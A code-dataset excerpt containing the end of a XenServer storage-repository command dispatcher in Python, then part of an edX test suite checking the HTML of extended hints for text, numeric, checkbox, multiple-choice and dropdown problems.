elif self.cmd == 'vdi_resize_online':
return target.resize_online(self.params['sr_uuid'], self.vdi_uuid, long(self.params['args'][0]))
elif self.cmd == 'vdi_activate':
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
writable = self.params['args'][0] == 'true'
return target.activate(self.params['sr_uuid'], self.vdi_uuid,
writable, caching_params)
elif self.cmd == 'vdi_deactivate':
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
return target.deactivate(self.params['sr_uuid'], self.vdi_uuid,
caching_params)
elif self.cmd == 'vdi_epoch_begin':
if caching_params.get(blktap2.VDI.CONF_KEY_MODE_ON_BOOT) != "reset":
return
if not "VDI_RESET_ON_BOOT/2" in self.driver_info['capabilities']:
raise xs_errors.XenError('Unimplemented')
return target.reset_leaf(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_epoch_end':
return
elif self.cmd == 'vdi_generate_config':
return target.generate_config(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_compose':
vdi1_uuid = sr.session.xenapi.VDI.get_uuid(self.params['args'][0])
return target.compose(self.params['sr_uuid'], vdi1_uuid, self.vdi_uuid)
elif self.cmd == 'vdi_attach_from_config':
ret = target.attach_from_config(self.params['sr_uuid'], self.vdi_uuid)
if not target.sr.driver_config.get("ATTACH_FROM_CONFIG_WITH_TAPDISK"):
return ret
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
return target.attach(self.params['sr_uuid'], self.vdi_uuid, True, True)
elif self.cmd == 'sr_create':
return sr.create(self.params['sr_uuid'], long(self.params['args'][0]))
elif self.cmd == 'sr_delete':
return sr.delete(self.params['sr_uuid'])
elif self.cmd == 'sr_update':
return sr.update(self.params['sr_uuid'])
elif self.cmd == 'sr_probe':
txt = sr.probe()
util.SMlog( "sr_probe result: %s" % util.splitXmlText( txt, showContd=True ) )
# return the XML document as a string
return xmlrpclib.dumps((txt,), "", True)
elif self.cmd == 'sr_attach':
is_master = False
if sr.dconf.get("SRmaster") == "true":
is_master = True
resetvdis.reset_sr(sr.session, util.get_this_host(),
self.params['sr_uuid'], is_master)
if is_master:
# Schedule a scan only when attaching on the SRmaster
util.set_dirty(sr.session, self.params["sr_ref"])
return sr.attach(self.params['sr_uuid'])
elif self.cmd == 'sr_detach':
return sr.detach(self.params['sr_uuid'])
elif self.cmd == 'sr_content_type':
return sr.content_type(self.params['sr_uuid'])
elif self.cmd == 'sr_scan':
return sr.scan(self.params['sr_uuid'])
else:
util.SMlog("Unknown command: %s" % self.cmd)
raise xs_errors.XenError('BadRequest')
def run(driver, driver_info):
"""Convenience method to run command on the given driver"""
cmd = SRCommand(driver_info)
try:
cmd.parse()
cmd.run_statics()
sr = driver(cmd, cmd.sr_uuid)
sr.direct = True
ret = cmd.run(sr)
if ret == None:
print util.return_nil ()
else:
print ret
except Exception, e:
try:
util.logException(driver_info['name'])
except KeyError:
util.SMlog('driver_info does not contain a \'name\' key.')
except:
pass
# If exception is of type SR.SRException,
# pass to xapi, else re-raise.
if isinstance(e, SR.SRException):
print e.toxml()
else:
raise
sys.exit(0)
| lgpl-2.1 |
don-github/edx-platform | common/lib/capa/capa/tests/test_hint_functionality.py | 41 | 34139 | # -*- coding: utf-8 -*-
"""
Tests of extended hints
"""
import unittest
from ddt import ddt, data, unpack
# With the use of ddt, some of the data expected_string cases below are naturally long stretches
# of text text without whitespace. I think it's best to leave such lines intact
# in the test code. Therefore:
# pylint: disable=line-too-long
# For out many ddt data cases, prefer a compact form of { .. }
# pylint: disable=bad-continuation
from . import new_loncapa_problem, load_fixture
class HintTest(unittest.TestCase):
"""Base class for tests of extended hinting functionality."""
def correctness(self, problem_id, choice):
"""Grades the problem and returns the 'correctness' string from cmap."""
student_answers = {problem_id: choice}
cmap = self.problem.grade_answers(answers=student_answers) # pylint: disable=no-member
return cmap[problem_id]['correctness']
def get_hint(self, problem_id, choice):
"""Grades the problem and returns its hint from cmap or the empty string."""
student_answers = {problem_id: choice}
cmap = self.problem.grade_answers(answers=student_answers) # pylint: disable=no-member
adict = cmap.cmap.get(problem_id)
if adict:
return adict['msg']
else:
return ''
# It is a little surprising how much more complicated TextInput is than all the other cases.
@ddt
class TextInputHintsTest(HintTest):
"""
Test Text Input Hints Test
"""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test that the tracking log comes out right."""
self.problem.capa_module.reset_mock()
self.get_hint(u'1_3_1', u'Blue')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc',
'problem_part_id': '1_2',
'trigger_type': 'single',
'hint_label': u'Correct',
'correctness': True,
'student_answer': [u'Blue'],
'question_type': 'stringresponse',
'hints': [{'text': 'The red light is scattered by water molecules leaving only blue light.'}]}
)
@data(
{'problem_id': u'1_2_1', u'choice': u'GermanyΩ',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">I do not think so.Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'franceΩ',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Viva la France!Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'FranceΩ',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Viva la France!Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'Mexico',
'expected_string': ''},
{'problem_id': u'1_2_1', u'choice': u'USAΩ',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Less well known, but yes, there is a Paris, Texas.Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'usaΩ',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Less well known, but yes, there is a Paris, Texas.Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'uSAxΩ',
'expected_string': u''},
{'problem_id': u'1_2_1', u'choice': u'NICKLANDΩ',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">The country name does not end in LANDΩ</div></div>'},
{'problem_id': u'1_3_1', u'choice': u'Blue',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">The red light is scattered by water molecules leaving only blue light.</div></div>'},
{'problem_id': u'1_3_1', u'choice': u'blue',
'expected_string': u''},
{'problem_id': u'1_3_1', u'choice': u'b',
'expected_string': u''},
)
@unpack
def test_text_input_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class TextInputExtendedHintsCaseInsensitive(HintTest):
"""Test Text Input Extended hints Case Insensitive"""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
@data(
{'problem_id': u'1_5_1', 'choice': 'abc', 'expected_string': ''}, # wrong answer yielding no hint
{'problem_id': u'1_5_1', 'choice': 'A', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-label">Woo Hoo: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'a', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-label">Woo Hoo: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'B', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'b', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'C', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-text">hint4</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'c', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-text">hint4</div></div>'},
# regexp cases
{'problem_id': u'1_5_1', 'choice': 'FGGG', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-text">hint6</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'fgG', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-text">hint6</div></div>'},
)
@unpack
def test_text_input_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class TextInputExtendedHintsCaseSensitive(HintTest):
"""Sometimes the semantics can be encoded in the class name."""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
@data(
{'problem_id': u'1_6_1', 'choice': 'abc', 'expected_string': ''},
{'problem_id': u'1_6_1', 'choice': 'A', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_6_1', 'choice': 'a', 'expected_string': u''},
{'problem_id': u'1_6_1', 'choice': 'B', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_6_1', 'choice': 'b', 'expected_string': u''},
{'problem_id': u'1_6_1', 'choice': 'C', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint4</div></div>'},
{'problem_id': u'1_6_1', 'choice': 'c', 'expected_string': u''},
# regexp cases
{'problem_id': u'1_6_1', 'choice': 'FGG', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint6</div></div>'},
{'problem_id': u'1_6_1', 'choice': 'fgG', 'expected_string': u''},
)
@unpack
def test_text_input_hints(self, problem_id, choice, expected_string):
message_text = self.get_hint(problem_id, choice)
self.assertEqual(message_text, expected_string)
@ddt
class TextInputExtendedHintsCompatible(HintTest):
"""
Compatibility test with mixed old and new style additional_answer tags.
"""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
@data(
{'problem_id': u'1_7_1', 'choice': 'A', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_7_1', 'choice': 'B', 'correct': 'correct', 'expected_string': ''},
{'problem_id': u'1_7_1', 'choice': 'C', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_7_1', 'choice': 'D', 'correct': 'incorrect', 'expected_string': ''},
# check going through conversion with difficult chars
{'problem_id': u'1_7_1', 'choice': """<&"'>""", 'correct': 'correct', 'expected_string': ''},
)
@unpack
def test_text_input_hints(self, problem_id, choice, correct, expected_string):
message_text = self.get_hint(problem_id, choice)
self.assertEqual(message_text, expected_string)
self.assertEqual(self.correctness(problem_id, choice), correct)
@ddt
class TextInputExtendedHintsRegex(HintTest):
"""
Extended hints where the answer is regex mode.
"""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
@data(
{'problem_id': u'1_8_1', 'choice': 'ABwrong', 'correct': 'incorrect', 'expected_string': ''},
{'problem_id': u'1_8_1', 'choice': 'ABC', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'ABBBBC', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'aBc', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'BBBB', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'bbb', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'C', 'correct': 'incorrect',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint4</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'c', 'correct': 'incorrect',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint4</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'D', 'correct': 'incorrect',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint6</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'd', 'correct': 'incorrect',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint6</div></div>'},
)
@unpack
def test_text_input_hints(self, problem_id, choice, correct, expected_string):
message_text = self.get_hint(problem_id, choice)
self.assertEqual(message_text, expected_string)
self.assertEqual(self.correctness(problem_id, choice), correct)
@ddt
class NumericInputHintsTest(HintTest):
"""
This class consists of a suite of test cases to be run on the numeric input problem represented by the XML below.
"""
xml = load_fixture('extended_hints_numeric_input.xml')
problem = new_loncapa_problem(xml) # this problem is properly constructed
def test_tracking_log(self):
self.get_hint(u'1_2_1', u'1.141')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc', 'problem_part_id': '1_1', 'trigger_type': 'single',
'hint_label': u'Nice',
'correctness': True,
'student_answer': [u'1.141'],
'question_type': 'numericalresponse',
'hints': [{'text': 'The square root of two turns up in the strangest places.'}]}
)
@data(
{'problem_id': u'1_2_1', 'choice': '1.141',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Nice: </div><div class="hint-text">The square root of two turns up in the strangest places.</div></div>'},
{'problem_id': u'1_3_1', 'choice': '4',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Pretty easy, uh?.</div></div>'},
# should get hint, when correct via numeric-tolerance
{'problem_id': u'1_2_1', 'choice': '1.15',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Nice: </div><div class="hint-text">The square root of two turns up in the strangest places.</div></div>'},
# when they answer wrong, nothing
{'problem_id': u'1_2_1', 'choice': '2', 'expected_string': ''},
)
@unpack
def test_numeric_input_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class CheckboxHintsTest(HintTest):
"""
This class consists of a suite of test cases to be run on the checkbox problem represented by the XML below.
"""
xml = load_fixture('extended_hints_checkbox.xml')
problem = new_loncapa_problem(xml) # this problem is properly constructed
@data(
{'problem_id': u'1_2_1', 'choice': [u'choice_0'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">You are right that apple is a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">Remember that grape is also a fruit.</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_1'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">Remember that apple is also a fruit.</div><div class="hint-text">Mushroom is a fungus, not a fruit.</div><div class="hint-text">Remember that grape is also a fruit.</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_2'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">Remember that apple is also a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">You are right that grape is a fruit</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_3'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">Remember that apple is also a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">Remember that grape is also a fruit.</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_4'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">Remember that apple is also a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">Remember that grape is also a fruit.</div><div class="hint-text">I do not know what a Camero is but it is not a fruit.</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_0', u'choice_1'], # compound
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Almost right: </div><div class="hint-text">You are right that apple is a fruit, but there is one you are missing. Also, mushroom is not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_1', u'choice_2'], # compound
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">You are right that grape is a fruit, but there is one you are missing. Also, mushroom is not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_0', u'choice_2'],
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="feedback-hint-multi"><div class="hint-text">You are right that apple is a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">You are right that grape is a fruit</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_0'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">No, sorry, a banana is a fruit.</div><div class="hint-text">You are right that mushrooms are not vegatbles</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_1'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">poor banana.</div><div class="hint-text">You are right that mushrooms are not vegatbles</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_2'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">poor banana.</div><div class="hint-text">Mushroom is a fungus, not a vegetable.</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_3'],
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="feedback-hint-multi"><div class="hint-text">poor banana.</div><div class="hint-text">You are right that mushrooms are not vegatbles</div><div class="hint-text">Brussel sprouts are vegetables.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_0', u'choice_1'], # compound
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Very funny: </div><div class="hint-text">Making a banana split?</div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_1', u'choice_2'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">poor banana.</div><div class="hint-text">Mushroom is a fungus, not a vegetable.</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_0', u'choice_2'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">No, sorry, a banana is a fruit.</div><div class="hint-text">Mushroom is a fungus, not a vegetable.</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
# check for interaction between compoundhint and correct/incorrect
{'problem_id': u'1_4_1', 'choice': [u'choice_0', u'choice_1'], # compound
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">AB</div></div>'},
{'problem_id': u'1_4_1', 'choice': [u'choice_0', u'choice_2'], # compound
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">AC</div></div>'},
# check for labeling where multiple child hints have labels
# These are some tricky cases
{'problem_id': '1_5_1', 'choice': ['choice_0', 'choice_1'],
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">AA: </div><div class="feedback-hint-multi"><div class="hint-text">aa</div></div></div>'},
{'problem_id': '1_5_1', 'choice': ['choice_0'],
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">aa</div><div class="hint-text">bb</div></div></div>'},
{'problem_id': '1_5_1', 'choice': ['choice_1'],
'expected_string': ''},
{'problem_id': '1_5_1', 'choice': [],
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">BB: </div><div class="feedback-hint-multi"><div class="hint-text">bb</div></div></div>'},
{'problem_id': '1_6_1', 'choice': ['choice_0'],
'expected_string': '<div class="feedback-hint-incorrect"><div class="feedback-hint-multi"><div class="hint-text">aa</div></div></div>'},
{'problem_id': '1_6_1', 'choice': ['choice_0', 'choice_1'],
'expected_string': '<div class="feedback-hint-correct"><div class="hint-text">compoundo</div></div>'},
# The user selects *nothing*, but can still get "unselected" feedback
{'problem_id': '1_7_1', 'choice': [],
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">bb</div></div></div>'},
# 100% not match of sel/unsel feedback
{'problem_id': '1_7_1', 'choice': ['choice_1'],
'expected_string': ''},
# Here we have the correct combination, and that makes feedback too
{'problem_id': '1_7_1', 'choice': ['choice_0'],
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="feedback-hint-multi"><div class="hint-text">aa</div><div class="hint-text">bb</div></div></div>'},
)
@unpack
def test_checkbox_hints(self, problem_id, choice, expected_string):
self.maxDiff = None # pylint: disable=invalid-name
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
class CheckboxHintsTestTracking(HintTest):
"""
Test the rather complicated tracking log output for checkbox cases.
"""
xml = """
<problem>
<p>question</p>
<choiceresponse>
<checkboxgroup>
<choice correct="true">Apple
<choicehint selected="true">A true</choicehint>
<choicehint selected="false">A false</choicehint>
</choice>
<choice correct="false">Banana
</choice>
<choice correct="true">Cronut
<choicehint selected="true">C true</choicehint>
</choice>
<compoundhint value="A C">A C Compound</compoundhint>
</checkboxgroup>
</choiceresponse>
</problem>
"""
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test checkbox tracking log - by far the most complicated case"""
# A -> 1 hint
self.get_hint(u'1_2_1', [u'choice_0'])
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'hint_label': u'Incorrect',
'module_id': 'i4x://Foo/bar/mock/abc',
'problem_part_id': '1_1',
'choice_all': ['choice_0', 'choice_1', 'choice_2'],
'correctness': False,
'trigger_type': 'single',
'student_answer': [u'choice_0'],
'hints': [{'text': 'A true', 'trigger': [{'choice': 'choice_0', 'selected': True}]}],
'question_type': 'choiceresponse'}
)
# B C -> 2 hints
self.problem.capa_module.runtime.track_function.reset_mock()
self.get_hint(u'1_2_1', [u'choice_1', u'choice_2'])
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'hint_label': u'Incorrect',
'module_id': 'i4x://Foo/bar/mock/abc',
'problem_part_id': '1_1',
'choice_all': ['choice_0', 'choice_1', 'choice_2'],
'correctness': False,
'trigger_type': 'single',
'student_answer': [u'choice_1', u'choice_2'],
'hints': [
{'text': 'A false', 'trigger': [{'choice': 'choice_0', 'selected': False}]},
{'text': 'C true', 'trigger': [{'choice': 'choice_2', 'selected': True}]}
],
'question_type': 'choiceresponse'}
)
# A C -> 1 Compound hint
self.problem.capa_module.runtime.track_function.reset_mock()
self.get_hint(u'1_2_1', [u'choice_0', u'choice_2'])
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'hint_label': u'Correct',
'module_id': 'i4x://Foo/bar/mock/abc',
'problem_part_id': '1_1',
'choice_all': ['choice_0', 'choice_1', 'choice_2'],
'correctness': True,
'trigger_type': 'compound',
'student_answer': [u'choice_0', u'choice_2'],
'hints': [
{'text': 'A C Compound',
'trigger': [{'choice': 'choice_0', 'selected': True}, {'choice': 'choice_2', 'selected': True}]}
],
'question_type': 'choiceresponse'}
)
@ddt
class MultpleChoiceHintsTest(HintTest):
"""
This class consists of a suite of test cases to be run on the multiple choice problem represented by the XML below.
"""
xml = load_fixture('extended_hints_multiple_choice.xml')
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test that the tracking log comes out right."""
self.problem.capa_module.reset_mock()
self.get_hint(u'1_3_1', u'choice_2')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc', 'problem_part_id': '1_2', 'trigger_type': 'single',
'student_answer': [u'choice_2'], 'correctness': False, 'question_type': 'multiplechoiceresponse',
'hint_label': 'OOPS', 'hints': [{'text': 'Apple is a fruit.'}]}
)
@data(
{'problem_id': u'1_2_1', 'choice': u'choice_0',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-text">Mushroom is a fungus, not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': u'choice_1',
'expected_string': ''},
{'problem_id': u'1_3_1', 'choice': u'choice_1',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Potato is a root vegetable.</div></div>'},
{'problem_id': u'1_2_1', 'choice': u'choice_2',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">OUTSTANDING: </div><div class="hint-text">Apple is indeed a fruit.</div></div>'},
{'problem_id': u'1_3_1', 'choice': u'choice_2',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">OOPS: </div><div class="hint-text">Apple is a fruit.</div></div>'},
{'problem_id': u'1_3_1', 'choice': u'choice_9',
'expected_string': ''},
)
@unpack
def test_multiplechoice_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class MultpleChoiceHintsWithHtmlTest(HintTest):
"""
This class consists of a suite of test cases to be run on the multiple choice problem represented by the XML below.
"""
xml = load_fixture('extended_hints_multiple_choice_with_html.xml')
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test that the tracking log comes out right."""
self.problem.capa_module.reset_mock()
self.get_hint(u'1_2_1', u'choice_0')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc', 'problem_part_id': '1_1', 'trigger_type': 'single',
'student_answer': [u'choice_0'], 'correctness': False, 'question_type': 'multiplechoiceresponse',
'hint_label': 'Incorrect', 'hints': [{'text': 'Mushroom <img src="#" ale="#"/>is a fungus, not a fruit.'}]}
)
@data(
{'problem_id': u'1_2_1', 'choice': u'choice_0',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">Mushroom <img src="#" ale="#"/>is a fungus, not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': u'choice_1',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">Potato is <img src="#" ale="#"/> not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': u'choice_2',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text"><a href="#">Apple</a> is a fruit.</div></div>'}
)
@unpack
def test_multiplechoice_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class DropdownHintsTest(HintTest):
"""
This class consists of a suite of test cases to be run on the drop down problem represented by the XML below.
"""
xml = load_fixture('extended_hints_dropdown.xml')
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test that the tracking log comes out right."""
self.problem.capa_module.reset_mock()
self.get_hint(u'1_3_1', u'FACES')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc', 'problem_part_id': '1_2', 'trigger_type': 'single',
'student_answer': [u'FACES'], 'correctness': True, 'question_type': 'optionresponse',
'hint_label': 'Correct', 'hints': [{'text': 'With lots of makeup, doncha know?'}]}
)
@data(
{'problem_id': u'1_2_1', 'choice': 'Multiple Choice',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Good Job: </div><div class="hint-text">Yes, multiple choice is the right answer.</div></div>'},
{'problem_id': u'1_2_1', 'choice': 'Text Input',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">No, text input problems do not present options.</div></div>'},
{'problem_id': u'1_2_1', 'choice': 'Numerical Input',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">No, numerical input problems do not present options.</div></div>'},
{'problem_id': u'1_3_1', 'choice': 'FACES',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">With lots of makeup, doncha know?</div></div>'},
{'problem_id': u'1_3_1', 'choice': 'dogs',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">NOPE: </div><div class="hint-text">Not dogs, not cats, not toads</div></div>'},
{'problem_id': u'1_3_1', 'choice': 'wrongo',
'expected_string': ''},
# Regression case where feedback includes answer substring
{'problem_id': u'1_4_1', 'choice': 'AAA',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">AAABBB1</div></div>'},
{'problem_id': u'1_4_1', 'choice': 'BBB',
